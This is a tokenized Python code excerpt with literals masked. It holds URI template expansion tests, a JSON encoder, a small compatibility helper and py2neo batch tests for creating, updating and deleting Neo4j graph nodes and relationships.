"<STR_LIT>" ) , <EOL> "<STR_LIT>" : OrderedDict ( [ ( "<STR_LIT>" , "<STR_LIT:;>" ) , ( "<STR_LIT>" , "<STR_LIT:.>" ) , ( "<STR_LIT>" , "<STR_LIT:U+002C>" ) ] ) , <EOL> "<STR_LIT:v>" : "<STR_LIT>" , <EOL> "<STR_LIT:x>" : "<STR_LIT>" , <EOL> "<STR_LIT:y>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : dict ( [ ] ) , <EOL> "<STR_LIT>" : None , <EOL> } <EOL> for template , expansion in expansions . items ( ) : <EOL> print ( template , "<STR_LIT>" , expansion ) <EOL> uri_template = URITemplate ( template ) <EOL> uri = uri_template . 
expand ( ** variables ) <EOL> assert uri == expansion <EOL> def test_empty_expansion ( ) : <EOL> _test_expansions ( { <EOL> None : None , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } ) <EOL> def test_can_expand_simple_strings ( ) : <EOL> _test_expansions ( { <EOL> "<STR_LIT>" : "<STR_LIT:value>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:value>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } ) <EOL> def test_can_expand_reserved_strings ( ) : <EOL> _test_expansions ( { <EOL> "<STR_LIT>" : "<STR_LIT:value>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } ) <EOL> def test_can_expand_fragments ( ) : <EOL> _test_expansions ( { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:foo>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } ) <EOL> def 
test_can_expand_labels ( ) : <EOL> _test_expansions ( { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:X>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:X>" , <EOL> "<STR_LIT>" : "<STR_LIT:X>" , <EOL> } ) <EOL> def test_can_expand_path_segments ( ) : <EOL> _test_expansions ( { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } ) <EOL> def test_can_expand_path_parameters ( ) : <EOL> _test_expansions ( { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } ) <EOL> def test_can_expand_form_queries ( ) : <EOL> _test_expansions ( { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : 
"<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } ) <EOL> def test_can_expand_form_query_continuations ( ) : <EOL> _test_expansions ( { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } ) <EOL> def test_can_parse_none_uri_template ( ) : <EOL> template = URITemplate ( None ) <EOL> assert template . string is None <EOL> uri = template . expand ( ) <EOL> assert uri . string is None <EOL> def test_can_parse_uri_template ( ) : <EOL> template = URITemplate ( "<STR_LIT>" ) <EOL> assert template . string == "<STR_LIT>" <EOL> def test_uri_template_equality ( ) : <EOL> template1 = URITemplate ( "<STR_LIT>" ) <EOL> template2 = URITemplate ( "<STR_LIT>" ) <EOL> assert template1 == template2 <EOL> def test_uri_template_inequality ( ) : <EOL> template1 = URITemplate ( "<STR_LIT>" ) <EOL> template2 = URITemplate ( "<STR_LIT>" ) <EOL> assert template1 != template2 <EOL> def test_uri_template_equality_with_string ( ) : <EOL> template = URITemplate ( "<STR_LIT>" ) <EOL> string = "<STR_LIT>" <EOL> assert template == string <EOL> def test_uri_template_equality_when_none ( ) : <EOL> template = URITemplate ( None ) <EOL> none = None <EOL> assert template == none <EOL> def test_uri_template_is_hashable ( ) : <EOL> template = URITemplate ( "<STR_LIT>" ) <EOL> hashed = hash ( template ) <EOL> assert hashed </s>
<s> from __future__ import unicode_literals <EOL> from datetime import date , time , datetime <EOL> from decimal import Decimal <EOL> import json <EOL> class JSONEncoder ( json . JSONEncoder ) : <EOL> def default ( self , obj ) : <EOL> if isinstance ( obj , ( datetime , date , time ) ) : <EOL> return obj . isoformat ( ) <EOL> if isinstance ( obj , Decimal ) : <EOL> return str ( obj ) <EOL> if isinstance ( obj , ( set , frozenset ) ) : <EOL> return list ( obj ) <EOL> if isinstance ( obj , complex ) : <EOL> return [ obj . real , obj . imag ] <EOL> return json . JSONEncoder . default ( self , obj ) </s>
<s> from sys import version_info <EOL> try : <EOL> from unittest . mock import Mock , patch <EOL> except ImportError : <EOL> from mock import Mock , patch <EOL> __all__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> if version_info >= ( <NUM_LIT:3> , ) : <EOL> long = int <EOL> else : <EOL> long = long <EOL> def assert_repr ( obj , repr_string , python2_repr_string = None ) : <EOL> if version_info >= ( <NUM_LIT:3> , ) or python2_repr_string is None : <EOL> assert repr ( obj ) == repr_string <EOL> else : <EOL> assert repr ( obj ) == python2_repr_string </s>
<s> from unittest import skipIf <EOL> from py2neo import DBMS , Node , Relationship , cast_node , cast_relationship <EOL> from py2neo . database . status import CypherSyntaxError , ConstraintError <EOL> from py2neo . ext . batman import BatchRunner , WriteBatch , CypherJob , BatchError , Job , Target , NodePointer , ManualIndexWriteBatch , BatchFinished <EOL> from test . util import GraphTestCase <EOL> dbms = DBMS ( ) <EOL> version_2_1 = ( <NUM_LIT:2> , <NUM_LIT:1> ) <= dbms . kernel_version < ( <NUM_LIT:2> , <NUM_LIT:2> ) <EOL> class BatchTestCase ( GraphTestCase ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( BatchTestCase , self ) . __init__ ( * args , ** kwargs ) <EOL> self . runner = BatchRunner ( self . graph ) <EOL> class NodeCreationTestCase ( GraphTestCase ) : <EOL> def setUp ( self ) : <EOL> self . batch = ManualIndexWriteBatch ( self . graph ) <EOL> def test_can_create_single_empty_node ( self ) : <EOL> self . batch . create ( Node ( ) ) <EOL> a , = self . batch . run ( ) <EOL> assert isinstance ( a , Node ) <EOL> assert not a <EOL> def test_can_create_multiple_nodes ( self ) : <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( cast_node ( { "<STR_LIT:name>" : "<STR_LIT>" } ) ) <EOL> self . batch . create ( Node ( name = "<STR_LIT>" ) ) <EOL> alice , bob , carol = self . batch . run ( ) <EOL> assert isinstance ( alice , Node ) <EOL> assert isinstance ( bob , Node ) <EOL> assert isinstance ( carol , Node ) <EOL> assert alice [ "<STR_LIT:name>" ] == "<STR_LIT>" <EOL> assert bob [ "<STR_LIT:name>" ] == "<STR_LIT>" <EOL> assert carol [ "<STR_LIT:name>" ] == "<STR_LIT>" <EOL> class RelationshipCreationTestCase ( GraphTestCase ) : <EOL> def setUp ( self ) : <EOL> self . batch = ManualIndexWriteBatch ( self . graph ) <EOL> def test_can_create_relationship_with_new_nodes ( self ) : <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . 
create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( ( <NUM_LIT:0> , "<STR_LIT>" , <NUM_LIT:1> ) ) <EOL> alice , bob , knows = self . batch . run ( ) <EOL> assert isinstance ( knows , Relationship ) <EOL> assert knows . start_node ( ) == alice <EOL> assert knows . type ( ) == "<STR_LIT>" <EOL> assert knows . end_node ( ) == bob <EOL> assert dict ( knows ) == { } <EOL> self . recycling = [ knows , alice , bob ] <EOL> def test_can_create_relationship_with_existing_nodes ( self ) : <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> alice , bob = self . batch . run ( ) <EOL> self . batch . jobs = [ ] <EOL> self . batch . create ( ( alice , "<STR_LIT>" , bob ) ) <EOL> knows , = self . batch . run ( ) <EOL> assert isinstance ( knows , Relationship ) <EOL> assert knows . start_node ( ) == alice <EOL> assert knows . type ( ) == "<STR_LIT>" <EOL> assert knows . end_node ( ) == bob <EOL> assert dict ( knows ) == { } <EOL> self . recycling = [ knows , alice , bob ] <EOL> def test_can_create_relationship_with_existing_start_node ( self ) : <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> alice , = self . batch . run ( ) <EOL> self . batch . jobs = [ ] <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( ( alice , "<STR_LIT>" , <NUM_LIT:0> ) ) <EOL> bob , knows = self . batch . run ( ) <EOL> assert isinstance ( knows , Relationship ) <EOL> assert knows . start_node ( ) == alice <EOL> assert knows . type ( ) == "<STR_LIT>" <EOL> assert knows . end_node ( ) == bob <EOL> assert dict ( knows ) == { } <EOL> self . recycling = [ knows , alice , bob ] <EOL> def test_can_create_relationship_with_existing_end_node ( self ) : <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> bob , = self . batch . run ( ) <EOL> self . batch . jobs = [ ] <EOL> self . batch . 
create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( ( <NUM_LIT:0> , "<STR_LIT>" , bob ) ) <EOL> alice , knows = self . batch . run ( ) <EOL> assert isinstance ( knows , Relationship ) <EOL> assert knows . start_node ( ) == alice <EOL> assert knows . type ( ) == "<STR_LIT>" <EOL> assert knows . end_node ( ) == bob <EOL> assert dict ( knows ) == { } <EOL> self . recycling = [ knows , alice , bob ] <EOL> def test_can_create_multiple_relationships ( self ) : <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( ( <NUM_LIT:0> , "<STR_LIT>" , <NUM_LIT:1> ) ) <EOL> self . batch . create ( ( <NUM_LIT:1> , "<STR_LIT>" , <NUM_LIT:2> ) ) <EOL> self . batch . create ( ( <NUM_LIT:2> , "<STR_LIT>" , <NUM_LIT:0> ) ) <EOL> alice , bob , carol , ab , bc , ca = self . batch . run ( ) <EOL> for relationship in [ ab , bc , ca ] : <EOL> assert isinstance ( relationship , Relationship ) <EOL> assert relationship . type ( ) == "<STR_LIT>" <EOL> def test_can_create_overlapping_relationships ( self ) : <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( ( <NUM_LIT:0> , "<STR_LIT>" , <NUM_LIT:1> ) ) <EOL> self . batch . create ( ( <NUM_LIT:0> , "<STR_LIT>" , <NUM_LIT:1> ) ) <EOL> alice , bob , knows1 , knows2 = self . batch . run ( ) <EOL> assert isinstance ( knows1 , Relationship ) <EOL> assert knows1 . start_node ( ) == alice <EOL> assert knows1 . type ( ) == "<STR_LIT>" <EOL> assert knows1 . end_node ( ) == bob <EOL> assert dict ( knows1 ) == { } <EOL> assert isinstance ( knows2 , Relationship ) <EOL> assert knows2 . start_node ( ) == alice <EOL> assert knows2 . type ( ) == "<STR_LIT>" <EOL> assert knows2 . end_node ( ) == bob <EOL> assert dict ( knows2 ) == { } <EOL> self . 
recycling = [ knows1 , knows2 , alice , bob ] <EOL> def test_can_create_relationship_with_properties ( self ) : <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( ( <NUM_LIT:0> , "<STR_LIT>" , <NUM_LIT:1> , { "<STR_LIT>" : <NUM_LIT> } ) ) <EOL> alice , bob , knows = self . batch . run ( ) <EOL> assert isinstance ( knows , Relationship ) <EOL> assert knows . start_node ( ) == alice <EOL> assert knows . type ( ) == "<STR_LIT>" <EOL> assert knows . end_node ( ) == bob <EOL> assert knows [ "<STR_LIT>" ] == <NUM_LIT> <EOL> self . recycling = [ knows , alice , bob ] <EOL> def test_create_function ( self ) : <EOL> self . batch . create ( Node ( name = "<STR_LIT>" ) ) <EOL> self . batch . create ( Node ( name = "<STR_LIT>" ) ) <EOL> self . batch . create ( ( <NUM_LIT:0> , "<STR_LIT>" , <NUM_LIT:1> ) ) <EOL> alice , bob , ab = self . batch . run ( ) <EOL> assert isinstance ( alice , Node ) <EOL> assert alice [ "<STR_LIT:name>" ] == "<STR_LIT>" <EOL> assert isinstance ( bob , Node ) <EOL> assert bob [ "<STR_LIT:name>" ] == "<STR_LIT>" <EOL> assert isinstance ( ab , Relationship ) <EOL> assert ab . start_node ( ) == alice <EOL> assert ab . type ( ) == "<STR_LIT>" <EOL> assert ab . end_node ( ) == bob <EOL> self . recycling = [ ab , alice , bob ] <EOL> class UniqueRelationshipCreationRestCase ( GraphTestCase ) : <EOL> def setUp ( self ) : <EOL> self . batch = ManualIndexWriteBatch ( self . graph ) <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_create_relationship_if_none_exists ( self ) : <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> alice , bob = self . batch . run ( ) <EOL> self . batch . jobs = [ ] <EOL> self . batch . get_or_create_path ( <EOL> alice , ( "<STR_LIT>" , { "<STR_LIT>" : <NUM_LIT> } ) , bob ) <EOL> path , = self . batch . 
run ( ) <EOL> knows = path [ <NUM_LIT:0> ] <EOL> assert isinstance ( knows , Relationship ) <EOL> assert knows . start_node ( ) == alice <EOL> assert knows . type ( ) == "<STR_LIT>" <EOL> assert knows . end_node ( ) == bob <EOL> assert knows [ "<STR_LIT>" ] == <NUM_LIT> <EOL> self . recycling = [ knows , alice , bob ] <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_will_get_relationship_if_one_exists ( self ) : <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> alice , bob = self . batch . run ( ) <EOL> self . batch . jobs = [ ] <EOL> self . batch . get_or_create_path ( <EOL> alice , ( "<STR_LIT>" , { "<STR_LIT>" : <NUM_LIT> } ) , bob ) <EOL> self . batch . get_or_create_path ( <EOL> alice , ( "<STR_LIT>" , { "<STR_LIT>" : <NUM_LIT> } ) , bob ) <EOL> path1 , path2 = self . batch . run ( ) <EOL> assert path1 == path2 <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_will_fail_batch_if_more_than_one_exists ( self ) : <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( ( <NUM_LIT:0> , "<STR_LIT>" , <NUM_LIT:1> ) ) <EOL> self . batch . create ( ( <NUM_LIT:0> , "<STR_LIT>" , <NUM_LIT:1> ) ) <EOL> alice , bob , k1 , k2 = self . batch . run ( ) <EOL> self . batch . jobs = [ ] <EOL> self . batch . get_or_create_path ( alice , "<STR_LIT>" , bob ) <EOL> with self . assertRaises ( BatchError ) as error : <EOL> self . batch . run ( ) <EOL> cause = error . exception . __cause__ <EOL> assert isinstance ( cause , ConstraintError ) <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_create_relationship_and_start_node ( self ) : <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> bob , = self . batch . run ( ) <EOL> self . batch . jobs = [ ] <EOL> self . batch . get_or_create_path ( None , "<STR_LIT>" , bob ) <EOL> path , = self . 
batch . run ( ) <EOL> knows = path [ <NUM_LIT:0> ] <EOL> alice = knows . start_node ( ) <EOL> assert isinstance ( knows , Relationship ) <EOL> assert isinstance ( alice , Node ) <EOL> assert knows . type ( ) == "<STR_LIT>" <EOL> assert knows . end_node ( ) == bob <EOL> self . recycling = [ knows , alice , bob ] <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_create_relationship_and_end_node ( self ) : <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> alice , = self . batch . run ( ) <EOL> self . batch . jobs = [ ] <EOL> self . batch . get_or_create_path ( alice , "<STR_LIT>" , None ) <EOL> path , = self . batch . run ( ) <EOL> knows = path [ <NUM_LIT:0> ] <EOL> bob = knows . end_node ( ) <EOL> assert isinstance ( knows , Relationship ) <EOL> assert knows . start_node ( ) == alice <EOL> assert knows . type ( ) == "<STR_LIT>" <EOL> assert isinstance ( bob , Node ) <EOL> self . recycling = [ knows , alice , bob ] <EOL> class DeletionTestCase ( GraphTestCase ) : <EOL> def setUp ( self ) : <EOL> self . batch = ManualIndexWriteBatch ( self . graph ) <EOL> def test_can_delete_relationship_and_related_nodes ( self ) : <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( ( <NUM_LIT:0> , "<STR_LIT>" , <NUM_LIT:1> ) ) <EOL> alice , bob , ab = self . batch . run ( ) <EOL> assert self . graph . exists ( alice | bob | ab ) <EOL> self . batch . jobs = [ ] <EOL> self . batch . delete ( ab ) <EOL> self . batch . delete ( alice ) <EOL> self . batch . delete ( bob ) <EOL> self . batch . run ( ) <EOL> assert not self . graph . exists ( alice | bob | ab ) <EOL> class PropertyManagementTestCase ( GraphTestCase ) : <EOL> def setUp ( self ) : <EOL> self . batch = ManualIndexWriteBatch ( self . graph ) <EOL> self . alice = cast_node ( { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } ) <EOL> self . 
bob = cast_node ( { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } ) <EOL> self . friends = cast_relationship ( ( self . alice , "<STR_LIT>" , self . bob , { "<STR_LIT>" : <NUM_LIT> } ) ) <EOL> self . graph . create ( self . alice | self . bob | self . friends ) <EOL> def _check_properties ( self , entity , expected_properties ) : <EOL> self . graph . pull ( entity ) <EOL> actual_properties = dict ( entity ) <EOL> assert len ( actual_properties ) == len ( expected_properties ) <EOL> for key , value in expected_properties . items ( ) : <EOL> assert key in actual_properties <EOL> assert str ( actual_properties [ key ] ) == str ( value ) <EOL> def test_can_add_new_node_property ( self ) : <EOL> self . batch . set_property ( self . alice , "<STR_LIT>" , <NUM_LIT> ) <EOL> self . batch . run ( ) <EOL> self . _check_properties ( self . alice , { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT> } ) <EOL> def test_can_overwrite_existing_node_property ( self ) : <EOL> self . batch . set_property ( self . alice , "<STR_LIT:name>" , "<STR_LIT>" ) <EOL> self . batch . run ( ) <EOL> self . _check_properties ( self . alice , { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } ) <EOL> def test_can_replace_all_node_properties ( self ) : <EOL> props = { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT> } <EOL> self . batch . set_properties ( self . alice , props ) <EOL> self . batch . run ( ) <EOL> self . _check_properties ( self . alice , props ) <EOL> def test_can_delete_node_property ( self ) : <EOL> self . batch . delete_property ( self . alice , "<STR_LIT>" ) <EOL> self . batch . run ( ) <EOL> self . _check_properties ( self . alice , { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> def test_can_delete_all_node_properties ( self ) : <EOL> self . batch . delete_properties ( self . alice ) <EOL> r = self . batch . run ( ) <EOL> self . _check_properties ( self . 
alice , { } ) <EOL> class MiscellaneousTestCase ( GraphTestCase ) : <EOL> def setUp ( self ) : <EOL> self . batch = ManualIndexWriteBatch ( self . graph ) <EOL> self . runner = self . batch . runner <EOL> def test_can_use_return_values_as_references ( self ) : <EOL> a = self . batch . create ( Node ( name = "<STR_LIT>" ) ) <EOL> b = self . batch . create ( Node ( name = "<STR_LIT>" ) ) <EOL> self . batch . create ( Relationship ( a , "<STR_LIT>" , b ) ) <EOL> results = self . batch . run ( ) <EOL> ab = results [ <NUM_LIT:2> ] <EOL> assert isinstance ( ab , Relationship ) <EOL> assert ab . start_node ( ) [ "<STR_LIT:name>" ] == "<STR_LIT>" <EOL> assert ab . end_node ( ) [ "<STR_LIT:name>" ] == "<STR_LIT>" <EOL> def test_can_handle_json_response_with_no_content ( self ) : <EOL> self . batch . create ( ( <NUM_LIT:0> , "<STR_LIT>" , <NUM_LIT:1> ) ) <EOL> results = self . batch . run ( ) <EOL> assert results == [ ] <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_cypher_job_with_invalid_syntax ( self ) : <EOL> self . batch . append ( CypherJob ( "<STR_LIT:X>" ) ) <EOL> with self . assertRaises ( BatchError ) as error : <EOL> self . batch . run ( ) <EOL> cause = error . exception . __cause__ <EOL> assert isinstance ( cause , CypherSyntaxError ) <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_cannot_resubmit_finished_job ( self ) : <EOL> self . batch . append ( CypherJob ( "<STR_LIT>" ) ) <EOL> self . runner . run ( self . batch ) <EOL> with self . assertRaises ( BatchFinished ) : <EOL> self . runner . run ( self . batch ) <EOL> class BatchRequestTestCase ( GraphTestCase ) : <EOL> def test_can_create_batch_request ( self ) : <EOL> method = "<STR_LIT:POST>" <EOL> endpoint = "<STR_LIT>" <EOL> target = Target ( endpoint ) <EOL> body = { "<STR_LIT>" : "<STR_LIT>" } <EOL> request = Job ( method , target , body ) <EOL> assert request . method == method <EOL> assert request . target . uri_string == endpoint <EOL> assert request . 
body == body <EOL> def test_batch_requests_are_equal_if_same ( self ) : <EOL> method = "<STR_LIT:POST>" <EOL> endpoint = "<STR_LIT>" <EOL> target = Target ( endpoint ) <EOL> body = { "<STR_LIT>" : "<STR_LIT>" } <EOL> request_1 = Job ( method , target , body ) <EOL> request_2 = request_1 <EOL> assert request_1 == request_2 <EOL> assert hash ( request_1 ) == hash ( request_2 ) <EOL> def test_batch_requests_are_unequal_if_not_same ( self ) : <EOL> method = "<STR_LIT:POST>" <EOL> endpoint = "<STR_LIT>" <EOL> target = Target ( endpoint ) <EOL> body = { "<STR_LIT>" : "<STR_LIT>" } <EOL> request_1 = Job ( method , target , body ) <EOL> request_2 = Job ( method , target , body ) <EOL> assert request_1 != request_2 <EOL> assert hash ( request_1 ) != hash ( request_2 ) <EOL> class WriteBatchTestCase ( GraphTestCase ) : <EOL> def setUp ( self ) : <EOL> self . batch = WriteBatch ( self . graph ) <EOL> def test_cannot_create_with_bad_type ( self ) : <EOL> try : <EOL> self . batch . create ( "<STR_LIT>" ) <EOL> except TypeError : <EOL> assert True <EOL> else : <EOL> assert False <EOL> def test_cannot_create_with_none ( self ) : <EOL> try : <EOL> self . batch . create ( None ) <EOL> except TypeError : <EOL> assert True <EOL> else : <EOL> assert False <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_create_path_with_new_nodes ( self ) : <EOL> self . batch . create_path ( { "<STR_LIT:name>" : "<STR_LIT>" } , "<STR_LIT>" , { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> results = self . batch . run ( ) <EOL> path = results [ <NUM_LIT:0> ] <EOL> assert len ( path ) == <NUM_LIT:1> <EOL> assert path . nodes ( ) [ <NUM_LIT:0> ] [ "<STR_LIT:name>" ] == "<STR_LIT>" <EOL> assert path [ <NUM_LIT:0> ] . type ( ) == "<STR_LIT>" <EOL> assert path . 
nodes ( ) [ <NUM_LIT:1> ] [ "<STR_LIT:name>" ] == "<STR_LIT>" <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_create_path_with_existing_nodes ( self ) : <EOL> alice = cast_node ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> bob = cast_node ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . graph . create ( alice | bob ) <EOL> self . batch . create_path ( alice , "<STR_LIT>" , bob ) <EOL> results = self . batch . run ( ) <EOL> path = results [ <NUM_LIT:0> ] <EOL> assert len ( path ) == <NUM_LIT:1> <EOL> assert path . nodes ( ) [ <NUM_LIT:0> ] == alice <EOL> assert path [ <NUM_LIT:0> ] . type ( ) == "<STR_LIT>" <EOL> assert path . nodes ( ) [ <NUM_LIT:1> ] == bob <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_path_creation_is_not_idempotent ( self ) : <EOL> alice = Node ( name = "<STR_LIT>" ) <EOL> self . graph . create ( alice ) <EOL> self . batch . create_path ( alice , "<STR_LIT>" , { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> results = self . batch . run ( ) <EOL> path = results [ <NUM_LIT:0> ] <EOL> bob = path . nodes ( ) [ <NUM_LIT:1> ] <EOL> assert path . nodes ( ) [ <NUM_LIT:0> ] == alice <EOL> assert bob [ "<STR_LIT:name>" ] == "<STR_LIT>" <EOL> self . batch = WriteBatch ( self . graph ) <EOL> self . batch . 